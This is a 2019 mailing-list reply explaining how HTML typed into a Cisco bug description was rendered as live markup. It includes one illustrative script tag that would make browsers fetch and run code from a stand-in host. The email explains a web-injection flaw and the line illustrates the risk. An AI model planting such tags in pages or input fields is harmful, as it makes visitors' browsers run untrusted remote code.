From: Anthony Holloway <avholloway+cisco-v...@gmail.com>
Sent: Tuesday, August 20, 2019 1:54 PM
To: Lelio Fulgenzi <le...@uoguelph.ca>
Cc: Norton, Mike <mikenor...@pwsd76.ab.ca>; Cisco VoIP Group
<cisco-voip@puck.nether.net>
Subject: Re: [cisco-voip] Bug Search Code Injection

Basically someone typed in some HTML code into the bug description, and when my
browser received/rendered the page content, my browser saw this code as code it
needed to execute, hence the <textarea> text box was rendered as opposed to the
text "<textarea>" just being shown on the page (like how it is in the title.

Now, while this page is not doing anything harmful at the moment, it's not
impossible for the code to have been:

<script>https://myharmfulwebsite.com/code-you-dont-want.js</script>

Then my browser would have downloaded and executed that.

I'm no hacker, but I know this can't be good.

Also, if nothing else, it ruins the value of the bug itself, because people
like you don't know what the hell it's trying to tell you.  Know what I mean
man?

On Tue, Aug 20, 2019 at 12:42 PM Lelio Fulgenzi